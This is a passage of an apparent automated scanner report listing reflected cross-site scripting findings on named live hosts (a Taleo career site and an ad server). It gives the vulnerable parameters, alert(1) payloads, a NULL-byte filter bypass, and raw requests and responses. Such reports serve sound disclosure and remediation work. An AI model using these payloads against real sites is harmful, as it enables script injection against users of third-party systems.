Referer: https://icfi.taleo.net/careersection/icf_prof_ext/myjobs.ftl
Cache-Control: max-age=0
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=00A3A9C577F898F511628EDF42DFEC62.JB_156269_156275
Content-Length: 18649

dialogTemplate-dialogFormvmVSIds=H4sIAAAAAAAAAFvzloG1hEFCPzmxKDW1qDg1uSQzP08%2FMy8ltUIvqzitEgDUAUy9IAAAAA%3D%3D&ftlstate=5PZ1Z2Z81Z1Z1Z14Z1Z0Z4qZ1Z0Z1Z1Z8Z8xZ1Z0Z3wZ1Z6Z4dZ1Z0Z0Z1Z0ZrZ1Z8Z1eZ1Z0ZvZ1Z8
...[SNIP]...
EWXKNwXpSvau%2BKHZ8rfqxQkIV0LtX6E84kSWAvJcwc5Rx5MPOFtE62D4FlJpgVww9O%2FiYkud%2F5R%2B3kHxxMlpe%2Fxq34Lh1jxAj74JUVUrs1SiywqbgLFVF65UKUNmbfkuTfbdyFM2Ls2AOHtrCWCf5URPaGpxpouvQn2X5p%2BF8CcBO%2BZjQAAA%3D%3D215c8'><x%20style%3dx%3aexpression(alert(1))>792fd5d617b&cshtstate=110040%7C&dialogTemplate-dialogForm%3AflowHeader%3AISWLDMessage=&dialogTemplate-dialogForm%3AflowHeader%3ALogged=false&dialogTemplate-dialogForm%3AflowHeader%3AexpiredSessionUrl=%2Fcareerse
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:33:49 GMT
Server: Taleo Web Server 7
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Cache-Control: private
Set-Cookie: JSESSIONID=00A3A9C577F898F511628EDF42DFEC62.JB_156269_156275
Content-Language: en
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 72265

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html lang="en"><head title="Privacy Agreement" profile
...[SNIP]...
D2iLiCQ6bE9MQSRoWsAEWXKNwXpSvau+KHZ8rfqxQkIV0LtX6E84kSWAvJcwc5Rx5MPOFtE62D4FlJpgVww9O/iYkud/5R+3kHxxMlpe/xq34Lh1jxAj74JUVUrs1SiywqbgLFVF65UKUNmbfkuTfbdyFM2Ls2AOHtrCWCf5URPaGpxpouvQn2X5p+F8CcBO+ZjQAAA==215c8'><x style=x:expression(alert(1))>792fd5d617b'/>
...[SNIP]...

2.22. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [cshtstate parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/jobsearch.ajax

Issue detail

The value of the cshtstate request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 95c5d%3balert(1)//9b23f311453 was submitted in the cshtstate parameter. This input was echoed as 95c5d;alert(1)//9b23f311453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /careersection/icf_prof_ext/jobsearch.ajax HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ftl?lang=en
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17820

ftlpageid=reqListBasicPage&ftlinterfaceid=requisitionListInterface&ftlcompid=validateTimeZoneId&jsfCmdId=validateTimeZoneId&ftlcompclass=InitTimeZoneAction&ftlcallback=requisition_restoreDatesValues&f
...[SNIP]...
he previous page&actDisplayReferralProfiler.mode=&rlPager.pagerLabelBeforeNextHidden= &artWillTravel=&radiusSiteListId.hasElements=false&locationMenu.selected=tabLocation&artJobType=&cshtstate=110040|95c5d%3balert(1)//9b23f311453&rssJobFieldIconTT=This criteria can be used for RSS feed creation: Job Field&listRequisition.isEmpty=false&canDisplayRSSButton=true&urgent=&radiusSiteListDrawer.state=false&initialHistoryPage=1&descr
...[SNIP]...

Response

2.23. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [focusOnField parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/jobsearch.ajax

Issue detail

The value of the focusOnField request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b3b54%3balert(1)//ceb765b47f1 was submitted in the focusOnField parameter. This input was echoed as b3b54;alert(1)//ceb765b47f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /careersection/icf_prof_ext/jobsearch.ajax HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ftl?lang=en
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17820

ftlpageid=reqListBasicPage&ftlinterfaceid=requisitionListInterface&ftlcompid=validateTimeZoneId&jsfCmdId=validateTimeZoneId&ftlcompclass=InitTimeZoneAction&ftlcallback=requisition_restoreDatesValues&f
...[SNIP]...
rawer.state=false&radiusLocationEmpty=&isApplicantUser=true&computeSiteListAction.distance=0&pBeaconBeat=300000&alreadyAppliedColumnDisplayed=false&computeSiteListAction.locationSiteId=0&focusOnField=b3b54%3balert(1)//ceb765b47f1&radiusSiteListPagerId.pagerLabelAfterNextHidden= &restoreInitialHistoryOnRefresh=false&listRequisition.size=10&calloutPageDisplayed=true&radiusSiteListPagerId.pagerLabelCount=Go to page {0}&artStudyL
...[SNIP]...

Response

2.24. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlISWLDMessage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/jobsearch.ajax

Issue detail

The value of the ftlISWLDMessage request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload abf03%3balert(1)//0b66bf8f9e8 was submitted in the ftlISWLDMessage parameter. This input was echoed as abf03;alert(1)//0b66bf8f9e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /careersection/icf_prof_ext/jobsearch.ajax HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ftl?lang=en
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17820

ftlpageid=reqListBasicPage&ftlinterfaceid=requisitionListInterface&ftlcompid=validateTimeZoneId&jsfCmdId=validateTimeZoneId&ftlcompclass=InitTimeZoneAction&ftlcallback=requisition_restoreDatesValues&f
...[SNIP]...
anizations.count=1&actDisplayReferralProfiler.requisitionNo=&computeSiteListAction.siteListId=&radiusSiteListPagerId.pagerLabelBeforePreviousHidden= &jobFieldMenu.selected=tabJobField&ftlISWLDMessage=abf03%3balert(1)//0b66bf8f9e8&navigate.target=&radiusSiteListId.nbElements=0&savecriteria.state=false&artEmployeeStatus=&organizationMenu.selected=&rlPager.currentPage=1&radiusSiteListPagerId.pagerLabelNextTT=Go to the next page&
...[SNIP]...

Response

2.25. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlajaxid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/jobsearch.ajax

Issue detail

The value of the ftlajaxid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a1722%3balert(1)//e84d7324ea was submitted in the ftlajaxid parameter. This input was echoed as a1722;alert(1)//e84d7324ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /careersection/icf_prof_ext/jobsearch.ajax HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ftl?lang=en
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17820

ftlpageid=reqListBasicPage&ftlinterfaceid=requisitionListInterface&ftlcompid=validateTimeZoneId&jsfCmdId=validateTimeZoneId&ftlcompclass=InitTimeZoneAction&ftlcallback=requisition_restoreDatesValues&ftlajaxid=ftlx1a1722%3balert(1)//e84d7324ea&tz=GMT-05:00&lang=en&ftlpageid=reqListBasicPage&ftlcompid=&ftlinterfaceid=&ftlcompclass=&ftlhistory=1300725172671|3.0.7.5.17.18.19.3.30.14&ftlPageHistory=&ftlstate=&ftlwinscr=&jsfCmdId=&ftlerrors=&po
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:34:24 GMT
Server: Taleo Web Server 7
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Cache-Control: private
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 22179

ftlx1a1722;alert(1)//e84d7324ea!|!requisition_restoreDatesValues!$!requisitionListInterface!|!validateTimeZoneId!$!true!|!false!|!62322!|!Research Assistant - Training!|!62322!|!Research Assistant - Training!|!62322!|!62322!|!62322!
...[SNIP]...

2.26. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlcallback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/jobsearch.ajax

Issue detail

The value of the ftlcallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6f42d%3balert(1)//c35154fef44 was submitted in the ftlcallback parameter. This input was echoed as 6f42d;alert(1)//c35154fef44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /careersection/icf_prof_ext/jobsearch.ajax HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ftl?lang=en
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17820

ftlpageid=reqListBasicPage&ftlinterfaceid=requisitionListInterface&ftlcompid=validateTimeZoneId&jsfCmdId=validateTimeZoneId&ftlcompclass=InitTimeZoneAction&ftlcallback=requisition_restoreDatesValues6f42d%3balert(1)//c35154fef44&ftlajaxid=ftlx1&tz=GMT-05:00&lang=en&ftlpageid=reqListBasicPage&ftlcompid=&ftlinterfaceid=&ftlcompclass=&ftlhistory=1300725172671|3.0.7.5.17.18.19.3.30.14&ftlPageHistory=&ftlstate=&ftlwinscr=&jsfCmdI
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:34:24 GMT
Server: Taleo Web Server 7
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Cache-Control: private
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 22180

ftlx1!|!requisition_restoreDatesValues6f42d;alert(1)//c35154fef44!$!requisitionListInterface!|!validateTimeZoneId!$!true!|!false!|!62322!|!Research Assistant - Training!|!62322!|!Research Assistant - Training!|!62322!|!62322!|!62322!|!Full-time!|!United States-Virgi
...[SNIP]...

2.27. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlcompid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/jobsearch.ajax

Issue detail

The value of the ftlcompid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 78e6d%3balert(1)//e1763b9990a was submitted in the ftlcompid parameter. This input was echoed as 78e6d;alert(1)//e1763b9990a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /careersection/icf_prof_ext/jobsearch.ajax HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ftl?lang=en
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17820

ftlpageid=reqListBasicPage&ftlinterfaceid=requisitionListInterface&ftlcompid=validateTimeZoneId78e6d%3balert(1)//e1763b9990a&jsfCmdId=validateTimeZoneId&ftlcompclass=InitTimeZoneAction&ftlcallback=requisition_restoreDatesValues&ftlajaxid=ftlx1&tz=GMT-05:00&lang=en&ftlpageid=reqListBasicPage&ftlcompid=&ftlinterfaceid=&ftlco
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:34:23 GMT
Server: Taleo Web Server 7
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Cache-Control: private
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 22180

ftlx1!|!requisition_restoreDatesValues!$!requisitionListInterface!|!validateTimeZoneId78e6d;alert(1)//e1763b9990a!$!true!|!false!|!62322!|!Research Assistant - Training!|!62322!|!Research Assistant - Training!|!62322!|!62322!|!62322!|!Full-time!|!United States-Virginia-Fairfax!|!false!|!!|!!|!!|!!|!Mar 18, 2011!|
...[SNIP]...

2.28. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [initialHistory parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/jobsearch.ajax

Issue detail

The value of the initialHistory request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 510f1%3balert(1)//2c9092ea227 was submitted in the initialHistory parameter. This input was echoed as 510f1;alert(1)//2c9092ea227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /careersection/icf_prof_ext/jobsearch.ajax HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ftl?lang=en
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17820

ftlpageid=reqListBasicPage&ftlinterfaceid=requisitionListInterface&ftlcompid=validateTimeZoneId&jsfCmdId=validateTimeZoneId&ftlcompclass=InitTimeZoneAction&ftlcallback=requisition_restoreDatesValues&f
...[SNIP]...
cation&listEmptyIsApplicantUser=false&radiusSiteListPagerId.listId=&radiusSiteListPagerId.currentPage=1&displayUrgentNeed=true&computeSiteListAction.zipcode=&jobCartIcon=cart_black.gif&initialHistory=510f1%3balert(1)//2c9092ea227&rlPager.pagerLabelAfterPreviousHidden= &rlPager.pagerLabelTT=Go to page {0}&listCount=&rlPager.pageLabelAfterHidden= &listLocales=&actOnReqApplyReqList.requisitionNo=&listLabels=&listRequisition.nbEl
...[SNIP]...

Response

2.29. https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [jobCartIcon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/jobsearch.ajax

Issue detail

The value of the jobCartIcon request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2f25e%3balert(1)//741ade6b10f was submitted in the jobCartIcon parameter. This input was echoed as 2f25e;alert(1)//741ade6b10f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /careersection/icf_prof_ext/jobsearch.ajax HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ftl?lang=en
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17820

ftlpageid=reqListBasicPage&ftlinterfaceid=requisitionListInterface&ftlcompid=validateTimeZoneId&jsfCmdId=validateTimeZoneId&ftlcompclass=InitTimeZoneAction&ftlcallback=requisition_restoreDatesValues&f
...[SNIP]...
eed creation: Location&listEmptyIsApplicantUser=false&radiusSiteListPagerId.listId=&radiusSiteListPagerId.currentPage=1&displayUrgentNeed=true&computeSiteListAction.zipcode=&jobCartIcon=cart_black.gif2f25e%3balert(1)//741ade6b10f&initialHistory=ftlx0!%7C!jobsearch_processSearchInitialHistory!%24!requisitionListInterface!%7C!listRequisition!%7C!rlPager!%24!true!%7C!false!%7C!62322!%7C!Research Assistant - Training!%7C!62322!%7
...[SNIP]...

Response

2.30. https://icfi.taleo.net/careersection/icf_prof_ext/moresearch.ftl [jobCartIcon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/moresearch.ftl

Issue detail

The value of the jobCartIcon request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fe132"><x%20style%3dx%3aexpression(alert(1))>1b71912cab8 was submitted in the jobCartIcon parameter. This input was echoed as fe132"><x style=x:expression(alert(1))>1b71912cab8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /careersection/icf_prof_ext/moresearch.ftl HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ftl?lang=en
Cache-Control: max-age=0
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 20861

lang=en&ftlpageid=reqListBasicPage&ftlcompid=navigate&ftlinterfaceid=topNavInterface&ftlcompclass=PageComponent&ftlhistory=1300725172671%7C3.0.7.5.17.18.19.3.30.14&ftlPageHistory=&ftlstate=&ftlwinscr=
...[SNIP]...
ed+creation%3A+Location&listEmptyIsApplicantUser=true&radiusSiteListPagerId.listId=&radiusSiteListPagerId.currentPage=1&displayUrgentNeed=true&computeSiteListAction.zipcode=&jobCartIcon=cart_black.gif%00fe132"><x%20style%3dx%3aexpression(alert(1))>1b71912cab8&initialHistory=ftlx0%21%7C%21jobsearch_processSearchInitialHistory%21%24%21requisitionListInterface%21%7C%21listRequisition%21%7C%21rlPager%21%24%21true%21%7C%21false%21%7C%2162322%21%7C%21Research+A
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:35:52 GMT
Server: Taleo Web Server 7
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Cache-Control: private
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 166657

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<img src="/careersection/800PRD.6.9.2.3.0/images/cart_black.giffe132"><x style=x:expression(alert(1))>1b71912cab8" id="topNavInterface.d288250e40" class="metalinkimg" />
...[SNIP]...

2.31. https://icfi.taleo.net/careersection/icf_prof_ext/myjobs.ftl [cshtstate parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/myjobs.ftl

Issue detail

The value of the cshtstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dbe02'><x%20style%3dx%3aexpression(alert(1))>c5fc3d4aea0 was submitted in the cshtstate parameter. This input was echoed as dbe02'><x style=x:expression(alert(1))>c5fc3d4aea0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /careersection/icf_prof_ext/myjobs.ftl HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/moresearch.ftl
Cache-Control: max-age=0
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 19242

lang=en&ftlpageid=reqListAdvancedPage&ftlcompid=navigate&ftlinterfaceid=topNavInterface&ftlcompclass=PageComponent&ftlhistory=1300725172671%7C3.0.7.5.17.18.19.3.30.14%7C4.18715.7.5.17.18.19.3.30.14%7C
...[SNIP]...
o+to+the+previous+page&actDisplayReferralProfiler.mode=&rlPager.pagerLabelBeforeNextHidden=+&udf2Menu.selected=&radiusSiteListId.hasElements=false&locationMenu.selected=tabLocation&cshtstate=110040%7Cdbe02'><x%20style%3dx%3aexpression(alert(1))>c5fc3d4aea0&rssJobFieldIconTT=This+criteria+can+be+used+for+RSS+feed+creation%3A+%3F%3FJobField%3F%3F&listRequisition.isEmpty=true&canDisplayRSSButton=true&radiusSiteListDrawer.state=false&initialHistoryPage=1&d
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:36:16 GMT
Server: Taleo Web Server 7
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=2C02529EDA7BE04A8E8715EE29B036C5.JB_156269_156275; Path=/careersection; Secure
Content-Language: en
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 70543

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html lang="en"><head title="Privacy Agreement" profile
...[SNIP]...
<input type='hidden' name='cshtstate' value='110040|dbe02'><x style=x:expression(alert(1))>c5fc3d4aea0'/>
...[SNIP]...

2.32. https://icfi.taleo.net/careersection/icf_prof_ext/myjobs.ftl [ftlstate parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://icfi.taleo.net
Path:	/careersection/icf_prof_ext/myjobs.ftl

Issue detail

The value of the ftlstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 331ea'><x%20style%3dx%3aexpression(alert(1))>634abaed757 was submitted in the ftlstate parameter. This input was echoed as 331ea'><x style=x:expression(alert(1))>634abaed757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /careersection/icf_prof_ext/myjobs.ftl HTTP/1.1
Host: icfi.taleo.net
Connection: keep-alive
Referer: https://icfi.taleo.net/careersection/icf_prof_ext/moresearch.ftl
Cache-Control: max-age=0
Origin: https://icfi.taleo.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 19242

lang=en&ftlpageid=reqListAdvancedPage&ftlcompid=navigate&ftlinterfaceid=topNavInterface&ftlcompclass=PageComponent&ftlhistory=1300725172671%7C3.0.7.5.17.18.19.3.30.14%7C4.18715.7.5.17.18.19.3.30.14%7C
...[SNIP]...
EWXKNwXpSvau%2BKHZ8rfqxQkIV0LtX6E84kSWAvJcwc5Rx5MPOFtE62D4FlJpgVww9O%2FiYkud%2F5R%2B3kHxxMlpe%2Fxq34Lh1jxAj74JUVUrs1SiywqbgLFVF65UKUNmbfkuTfbdyFM2Ls2AOHtrCWCf5URPaGpxpouvQn2X5p%2BF8CcBO%2BZjQAAA%3D%3D331ea'><x%20style%3dx%3aexpression(alert(1))>634abaed757&ftlwinscr=0&jsfCmdId=navigate&ftlerrors=&portal=&tz=GMT-05%3A00&iniurl.src=&iniurl.media_id=&zipcodePanelErrorDrawer.state=false&rlPager.pageLabelBeforeHidden=+&radiusSiteListPagerId.nbDisplayPage=5&
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:35:59 GMT
Server: Taleo Web Server 7
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=93B95D4F3D30672EF1CBD69F1FDC509D.JB_156269_156275; Path=/careersection; Secure
Content-Language: en
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 70543

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html lang="en"><head title="Privacy Agreement" profile
...[SNIP]...
D2iLiCQ6bE9MQSRoWsAEWXKNwXpSvau+KHZ8rfqxQkIV0LtX6E84kSWAvJcwc5Rx5MPOFtE62D4FlJpgVww9O/iYkud/5R+3kHxxMlpe/xq34Lh1jxAj74JUVUrs1SiywqbgLFVF65UKUNmbfkuTfbdyFM2Ls2AOHtrCWCf5URPaGpxpouvQn2X5p+F8CcBO+ZjQAAA==331ea'><x style=x:expression(alert(1))>634abaed757'/>
...[SNIP]...

2.33. http://k.collective-media.net/cmadj/cm.womensforum/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.womensforum/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39b71'-alert(1)-'f79a09b6d14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

